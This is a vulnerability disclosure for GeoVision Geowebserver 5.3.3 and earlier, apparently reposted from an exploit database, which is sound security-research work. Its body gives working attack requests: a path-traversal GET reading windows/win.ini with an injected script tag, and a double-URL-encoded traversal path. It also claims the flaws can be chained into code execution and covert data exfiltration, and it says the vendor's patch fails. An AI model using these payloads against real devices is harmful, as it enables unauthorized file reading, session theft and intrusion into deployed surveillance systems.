GeoVision Geowebserver 5.3.3 LFI / XSS / CSRF / Code Execution

2021.08.17
Credit: Ken Pyle
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE # DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM # Date: 6-16-21 (Vendor Notified) # Exploit Author: Ken 's1ngular1ty' Pyle # Vendor Homepage: https://www.geovision.com.tw/cyber_security.php # Version: <= 5.3.3 # Tested on: Windows 20XX / MULTIPLE # CVE : https://www.geovision.com.tw/cyber_security.php GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft: Nested Exploitation of the LFI, XSS, HTML / Browser Injection: GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1 Absolute exploitation of the LFI: POST /Visitor/bin/WebStrings.srf?obj_name=win.ini GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor. ex. obj_name=INJECTEDHTML / XSS The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors: ex. /Visitor//%252e(path to target) These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API: The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack. These attacks were disclosed as part of the IOTVillage Presentation: https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top